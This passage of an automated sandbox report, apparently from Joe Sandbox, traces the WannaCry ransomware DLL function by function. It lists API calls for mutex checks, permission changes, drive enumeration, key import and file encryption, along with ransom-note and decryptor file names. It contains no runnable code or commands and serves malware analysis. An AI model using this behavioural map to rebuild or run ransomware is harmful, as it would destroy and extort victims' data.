      • Part of subcall function 100057C0: GetDriveTypeW.KERNEL32(?), ref: 10005A7D
      • Part of subcall function 100057C0: Sleep.KERNEL32(0000EA60), ref: 10005A98
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10005D34
    • CreateThread.KERNEL32(00000000,00000000,10004990,00000000,00000000,00000000), ref: 10005D4C
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10005D57
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004600, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46
    APIs
    • OpenMutexA.KERNEL32(00100000,00000001,Global\MsWinZonesCacheCounterMutexW), ref: 10004610
    • CloseHandle.KERNEL32(00000000), ref: 1000461B
    • sprintf.MSVCRT ref: 1000463F
    • CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 10004651
    • GetLastError.KERNEL32 ref: 1000465D
    • CloseHandle.KERNEL32(00000000), ref: 1000466B
      • Part of subcall function 100013E0: GetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,?,00000000,?), ref: 1000140A
      • Part of subcall function 100013E0: SetEntriesInAclA.ADVAPI32 ref: 1000145E
      • Part of subcall function 100013E0: SetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,00000001,00000000), ref: 10001471
      • Part of subcall function 100013E0: LocalFree.KERNEL32(?), ref: 10001482
      • Part of subcall function 100013E0: LocalFree.KERNEL32(00000001), ref: 10001489
      • Part of subcall function 100013E0: LocalFree.KERNEL32(?), ref: 10001490
    Strings
    • Global\MsWinZonesCacheCounterMutexA, xrefs: 10004634
    • Global\MsWinZonesCacheCounterMutexW, xrefs: 10004604
    • %s%d, xrefs: 10004639
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10001080, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68
    APIs
    • CreateProcessA.KERNEL32 ref: 100010D3
    • WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
    • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
    • GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
    • CloseHandle.KERNEL32(?), ref: 10001121
    • CloseHandle.KERNEL32(?), ref: 10001128
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005340, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46
    APIs
    • fopen.MSVCRT ref: 10005390
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000026B,00000000,00000000), ref: 100053BB
    • fprintf.MSVCRT ref: 100053CC
    • fclose.MSVCRT ref: 100053D3
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10001000, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100013E0, Relevance: 9.1, APIs: 6, Instructions: 65
    APIs
    • GetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,?,00000000,?), ref: 1000140A
    • SetEntriesInAclA.ADVAPI32 ref: 1000145E
    • SetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,00000001,00000000), ref: 10001471
    • LocalFree.KERNEL32(?), ref: 10001482
    • LocalFree.KERNEL32(00000001), ref: 10001489
    • LocalFree.KERNEL32(?), ref: 10001490
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10002F70, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
    APIs
    • GetTempFileNameW.KERNELBASE(?,~SD,00000000,00000000), ref: 10002FA1
    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000002,00000000), ref: 10002FBB
    • CloseHandle.KERNEL32(00000000), ref: 10002FC8
    • DeleteFileW.KERNELBASE(00000000), ref: 10002FD3
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003C40, Relevance: 7.6, APIs: 5, Instructions: 77
    APIs
      • Part of subcall function 10004170: CryptExportKey.ADVAPI32(?,00000000,?,00000000,?,?,00000008,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041AD
      • Part of subcall function 10004170: CryptGetKeyParam.ADVAPI32(?,00000008,?,?,00000000,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041DF
      • Part of subcall function 10004170: GlobalAlloc.KERNEL32(00000000,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 10004229
      • Part of subcall function 10004170: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100042BA
      • Part of subcall function 10004170: GlobalFree.KERNEL32(?), ref: 10004320
    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10003CA3
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000008), ref: 10003CB8
    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 10003CD3
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 10003CE3
    • GlobalFree.KERNEL32(00000000), ref: 10003CE7
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004730, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
    APIs
    • CreateFileA.KERNEL32(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10004749
    • WriteFile.KERNEL32(00000000), ref: 10004775
    • CloseHandle.KERNEL32(00000000), ref: 1000477C
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100046D0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
    APIs
    • CreateFileA.KERNEL32(00000000.res,80000000,00000001,00000000,00000003,00000000,00000000), ref: 100046E6
    • ReadFile.KERNEL32(00000000,1000DC68,00000088,?,00000000), ref: 10004712
    • CloseHandle.KERNEL32(00000000), ref: 10004719
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004690, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
    APIs
    • CreateMutexA.KERNELBASE(00000000,00000001,MsWinZonesCacheCounterMutexA,?,10005B11), ref: 1000469A
    • GetLastError.KERNEL32(?,10005B11), ref: 100046A6
    • CloseHandle.KERNEL32(00000000), ref: 100046B4
    Strings
    • MsWinZonesCacheCounterMutexA, xrefs: 10004691
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003280, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    APIs
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 1000329A
    • CopyFileW.KERNEL32(@WanaDecryptor@.exe,?,00000001), ref: 100032AF
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003240, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    APIs
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 1000325A
    • CopyFileW.KERNEL32(@WanaDecryptor@.exe.lnk,?,00000001), ref: 1000326F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003200, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    APIs
    • swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 1000321A
    • CopyFileW.KERNEL32(@Please_Read_Me@.txt,?,00000001), ref: 1000322F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100021AC, Relevance: 6.0, APIs: 4, Instructions: 22
    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004790, Relevance: 4.5, APIs: 3, Instructions: 27
    APIs
    • time.MSVCRT ref: 100047AA
      • Part of subcall function 10004730: CreateFileA.KERNEL32(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10004749
      • Part of subcall function 10004730: WriteFile.KERNEL32(00000000), ref: 10004775
      • Part of subcall function 10004730: CloseHandle.KERNEL32(00000000), ref: 1000477C
    • Sleep.KERNELBASE(000003E8), ref: 100047C9
    • ExitThread.KERNEL32 ref: 100047DC
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005300, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 20
    APIs
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    • Sleep.KERNELBASE(00007530), ref: 10005326
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100045C0, Relevance: 3.0, APIs: 2, Instructions: 15
    APIs
      • Part of subcall function 10004500: sprintf.MSVCRT ref: 10004528
      • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(?), ref: 1000453C
      • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
    • Sleep.KERNELBASE(00001388), ref: 100045E3
    • ExitThread.KERNEL32 ref: 100045E9
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003760, Relevance: 1.3, APIs: 1, Instructions: 38
    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd

    Non-executed Functions

    Function 10004A40, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 200
    APIs
    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10004A97
    • wcslen.MSVCRT ref: 10004A9E
    • wcsrchr.MSVCRT ref: 10004AC0
    • wcschr.MSVCRT ref: 10004AE9
    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 10004B1B
    • wcslen.MSVCRT ref: 10004B25
    • wcsrchr.MSVCRT ref: 10004B3D
    • swprintf.MSVCRT(?,%s\*.*,?), ref: 10004B87
    • FindFirstFileW.KERNEL32(?,?), ref: 10004BA0
    • wcscmp.MSVCRT ref: 10004BD7
    • wcscmp.MSVCRT ref: 10004BF5
    • swprintf.MSVCRT(?,%s\%s\%s,?,?,-00000002), ref: 10004C2F
    • wcscmp.MSVCRT ref: 10004C51
    • swprintf.MSVCRT(?,%s\%s\%s,?,?,00000000), ref: 10004C79
    • FindNextFileW.KERNEL32(?,?), ref: 10004CA2
    • FindClose.KERNEL32(?), ref: 10004CB5
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004440, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 10004456
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?), ref: 10004473
    • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 10004480
    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 1000448D
    • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 1000449A
    • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 100044A7
    • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 100044B4
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004F20, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 90
    APIs
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 10004F7C
    • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 10004F99
    • CopyFileW.KERNEL32(?,?,00000000), ref: 10004FB4
    • GetUserNameW.ADVAPI32 ref: 10004FF0
    • _wcsicmp.MSVCRT ref: 10005006
    • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 1000501E
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 10005034
    • CopyFileW.KERNEL32(@WanaDecryptor@.exe,?,00000000), ref: 10005045
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005540, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101
    APIs
    • InterlockedExchangeAdd.KERNEL32(1000D4E4,00000000), ref: 1000557E
    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 100055AE
    • Sleep.KERNEL32(000003E8), ref: 100055CB
    • GetDriveTypeW.KERNEL32(?), ref: 100055E9
    • GetDriveTypeW.KERNEL32(00000000,00000000,00000019,76E6EEF2,00000000), ref: 100055FD
    • InterlockedExchange.KERNEL32(1000D4E4,?), ref: 1000560A
    • GetDriveTypeW.KERNEL32(?), ref: 10005615
      • Part of subcall function 100027F0: ??2@YAPAXI@Z.MSVCRT ref: 1000281A
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002899
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 100028FD
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002917
      • Part of subcall function 10005060: GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
      • Part of subcall function 10005060: GetTempPathW.KERNEL32(00000104,?), ref: 10005094
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050A1
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050AB
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050B9
      • Part of subcall function 10005060: swprintf.MSVCRT(?,%C:\%s,?,$RECYCLE), ref: 100050DC
      • Part of subcall function 10005060: CreateDirectoryW.KERNEL32(?,00000000), ref: 100050E8
      • Part of subcall function 10005060: sprintf.MSVCRT ref: 100050FE
      • Part of subcall function 10001910: wcscpy.MSVCRT ref: 10001920
      • Part of subcall function 10001910: swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 1000194B
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003D10, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154
    APIs
      • Part of subcall function 10003A80: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,76E76DBE,76E76DBE,10003D9E,?,76E76DBE,00000000), ref: 10003A9D
      • Part of subcall function 10003F00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
      • Part of subcall function 10003F00: GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
      • Part of subcall function 10003F00: GlobalAlloc.KERNEL32(00000000,00000000), ref: 10003F8A
      • Part of subcall function 10003F00: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10003FA2
      • Part of subcall function 10003F00: CryptImportKey.ADVAPI32(76E76DBE,00000000,?,00000000,00000000,?), ref: 10003FC5
      • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10003FD5
      • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10004017
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200,?,?,?,?,76E76DBE,00000000), ref: 10003E2B
    • _local_unwind2.MSVCRT ref: 10003E3B
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,?,?,?,?,76E76DBE,00000000), ref: 10003E70
    • strncmp.MSVCRT(00000000,76E76DBE,?,?,?,?,?,76E76DBE,00000000), ref: 10003EA1
    • _local_unwind2.MSVCRT ref: 10003EB4
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004370, Relevance: 6.1, APIs: 4, Instructions: 75
    APIs
      • Part of subcall function 10004420: CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
    • EnterCriticalSection.KERNEL32(?,00000010,?,?,?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043CA
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,10001DBA,?,00000000,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043E7
    • LeaveCriticalSection.KERNEL32(?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043F2
    • LeaveCriticalSection.KERNEL32(?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 10004401
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10001360, Relevance: 4.5, APIs: 3, Instructions: 45
    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,768DF708), ref: 1000139C
    • CheckTokenMembership.ADVAPI32(00000000,?,768DF708,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 100013B6
    • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 100013C9
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003BB0, Relevance: 4.5, APIs: 3, Instructions: 24
    APIs
    • CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BBB
    • CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BD0
    • CryptReleaseContext.ADVAPI32(?,00000000,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BE7
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003A80, Relevance: 1.5, APIs: 1, Instructions: 26
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,76E76DBE,76E76DBE,10003D9E,?,76E76DBE,00000000), ref: 10003A9D
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
